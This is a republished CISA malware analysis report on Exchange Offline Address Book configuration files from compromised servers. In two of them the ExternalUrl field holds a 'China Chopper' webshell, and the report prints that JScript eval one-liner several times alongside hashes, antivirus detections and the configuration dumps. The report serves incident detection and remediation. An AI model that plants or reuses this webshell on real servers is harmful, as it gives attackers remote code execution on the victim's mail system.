This article is contributed. See the original author and article here.

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

CISA received three files for analysis. These files appear to contain configuration data for three different Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD) extracted from a Microsoft Exchange Server. Two output files show malicious modifications for the ExternalUrl parameters for these two OAB VDs on the targeted Exchange Servers. In two of the OAB VDs, the ExternalUrl parameter contains a “China Chopper” webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server. The remaining configuration file does not contain a webshell in the ExternalUrl field.

For a downloadable copy of IOCs, see: MAR-10329107-1.v1.stix.

Submitted Files (3)

be17c38d0231ad593662f3b2c664b203e5de9446e858b7374864430e15fbf22d (Fc1b3WDP.aspx)

c0caa9be0c1d825a8af029cc07207f2e2887fce4637a3d8498692d37a52b4014 (discover.aspx)

d9c75da893975415663c4f334d2ad292e6001116d829863ab572c311e7edea77 (F48zhi6U.aspx)

Findings

d9c75da893975415663c4f334d2ad292e6001116d829863ab572c311e7edea77

Tags

backdoor

Details
Name F48zhi6U.aspx
Size 2211 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 08a939f320ffbdb82db2d57520677725
SHA1 c3011f31d556a0b1422e78c0906406283bdfa12f
SHA256 d9c75da893975415663c4f334d2ad292e6001116d829863ab572c311e7edea77
SHA512 506236cd328d840b741cd2e80ca58b7d2815e6d1a7dfd036e19b18526b57197bf93884907909524156d8e291e78f0da8f4c56ce19ec854dc58997ac9d5c8c9f3
ssdeep 24:kNrde9Mr+rJTh91Q/PrrSE56j0SzMaEVMr6j71idfh6hlnU2E4ONF0qzdsfj:kNrdeJ1BL0KM5QZ6hlnC4ONF0qzS
Entropy 4.705811
Antivirus
Microsoft Security Essentials Backdoor:ASP/Chopper.F!dha
Sophos Troj/WebShel-L
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised Microsoft Exchange Server. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will directly be executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD containing JavaScript code that will be executed on the target system.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:

–Begin webshell–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
–End webshell–

Note: The hard-coded key used for authentication was redacted from the code above.

This file contains the following configuration data (sensitive data was redacted):

–Begin configuration–
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS[:]//[REDACTED]-EX18.[REDACTED].local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 2106.2)
Server                         : [REDACTED]-EX18
InternalUrl                     : hxxps[:]//[REDACTED].local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED]-EX18,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=[REDACTED],CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=[REDACTED],DC=local
Identity                        : [REDACTED]-EX18OAB (Default Web Site)
Guid                            : 14934026-b775-46ac-a6d4-884ebd8eccc0
ObjectCategory                 : [REDACTED].local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 2/28/2021 3:18:46 AM
–End configuration–

c0caa9be0c1d825a8af029cc07207f2e2887fce4637a3d8498692d37a52b4014

Tags

backdoor

Details
Name discover.aspx
Size 2204 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 751a5e2e6c97f55c86cb7d4e5afb0928
SHA1 b2ce5a315c8dfdbe89b5bfa834491a71452b0c76
SHA256 c0caa9be0c1d825a8af029cc07207f2e2887fce4637a3d8498692d37a52b4014
SHA512 3ecb7044d4534db78952ab9c3c773323df6b938c246f533265b9945750043475f51fcf68904b9be98193c4fabeadc4060878172fd8caa312e3f8a6d16ff97837
ssdeep 24:kNrde9Mr+rJTh91Q/PrrSE56j0SzMaF8DVMr6j71idfh6hlTYU2E4ONF0qBfj:kNrdeJ1BL0oM5QZ6hlTYC4ONF0qZ
Entropy 4.690795
Antivirus
Microsoft Security Essentials Backdoor:ASP/Chopper.F!dha
Sophos Troj/WebShel-L
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised Microsoft Exchange Server. The Exchange OAB VD is utilized to access Microsoft Exchange Address Lists. The OAB ExternalUrl parameter has been modified by a remote operator to contain a “China Chopper” webshell file in the ExternalUrl field, which is used to perform additional code execution.

Displayed below are the contents of the webshell in the configuration ExternalUrl field:

–Begin webshell–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
–End webshell–

Note: The hard-coded key used for authentication was redacted from the code above.

Displayed below are the contents of the configuration (sensitive data was redacted):

–Begin configuration–
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS[:]//[REDACTED]-EX18.SPMWD.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 2106.2)
Server                         : [REDACTED]-EX18
InternalUrl                     : hxxps[:]//[REDACTED].local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED]-EX18,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=[REDACTED],CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=[REDACTED],DC=local
Identity                        : [REDACTED]-EX18OAB (Default Web Site)
Guid                            : 7fe16dfd-4ac2-4770-b2c8-65550cee535b
ObjectCategory                 : [REDACTED].local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/3/2021 10:14:04 AM
WhenCreated                     : 2/28/2021 3:18:54 AM
WhenChangedUTC                 : 3/3/2021 4:14:04 PM
WhenCreatedUTC                 : 2/28/2021 9:18:54 AM
OrganizationId                 :
Id                             : [REDACTED]-EX18OAB (Default Web Site)
OriginatingServer             : [REDACTED]-DC19.[REDACTED].local
IsValid                         : True
–End configuration–

be17c38d0231ad593662f3b2c664b203e5de9446e858b7374864430e15fbf22d

Tags

backdoor

Details
Name Fc1b3WDP.aspx
Size 2230 bytes
Type ASCII text, with CRLF line terminators
MD5 6221e5f594a1eb04279d7e217801e90d
SHA1 34a34682efe6e9bd7102db6ab52e7bdcfb573a5d
SHA256 be17c38d0231ad593662f3b2c664b203e5de9446e858b7374864430e15fbf22d
SHA512 6afdcd18162219606c26742cc569320e5b2bf348ee8387502b8b746e69eb677a505f422c0d278b2386debdcffeea3f971270a14f8b5d522a50128978d1f9670c
ssdeep 24:k/U0rdjMr+rJTh91Q/PrG68U6Q68UB1idfh6hl9U2E4ONF0q3dYfj:k/U0rdf1BY67PQZ6hl9C4ONF0q3m
Entropy 4.531459
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This is file is an OAB configuration file. The configuration contains a key in the ExternalUrl field used for authentication. No webshell was observed in this configuration at the time of analysis.

Displayed below are the contents of the configuration (sensitive data was redacted):

–Begin configuration–
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : Default Offline Address List (Ex2013)
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : True
MetabasePath                    : IIS[:]//[REDACTED]-EX18.[REDACTED].local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 2106.2)
Server                         : [REDACTED]-EX18
InternalUrl                     : hxxps[:]//[REDACTED’.net/oab
InternalAuthenticationMethods : OAuth
                                WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/[REDACTED]
ExternalAuthenticationMethods : OAuth
                                WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED]-EX18,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=[REDACTED],CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=[REDACTED],DC=local
Identity                        : [REDACTED]-EX18OAB (Default Web Site)
Guid                            : 07f36d7a-e617-444f-be47-1cd20de5d832
ObjectCategory                 : [REDACTED].local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 2/27/2021 7:18:13 AM
WhenCreated                     : 8/2/2018 8:41:28 AM
WhenChangedUTC                 : 2/27/2021 1:18:13 PM
WhenCreatedUTC                 : 8/2/2018 1:41:28 PM
OrganizationId                 :
Id                             : [REDACTED]-EX18OAB (Default Web Site)
OriginatingServer             : [REDACTED]-DC19.[REDACTED].local
IsValid                         : True
–End configuration–

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.